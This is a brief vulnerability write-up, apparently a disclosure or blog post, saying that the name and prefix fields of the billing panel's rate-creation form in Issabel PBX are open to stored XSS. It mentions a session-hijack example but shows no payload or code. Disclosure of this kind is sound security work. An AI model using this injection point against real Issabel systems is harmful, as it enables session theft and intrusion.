How to exploitation stored XSS on Issabel PBX
Home Page: https://www.issabel.org/
Source Forge: https://sourceforge.net/projects/issabelpbx/
In Isabel’s administrative interface, there is a report panel. On the billing panel, we can create new rates. The form of creating new rates is vulnerable to stored XSS.
The name and prefix fields are vulnerable, if we inject an XSS payload into either of them we will succeed.
Stored XSS successfully performed.
Session hijack example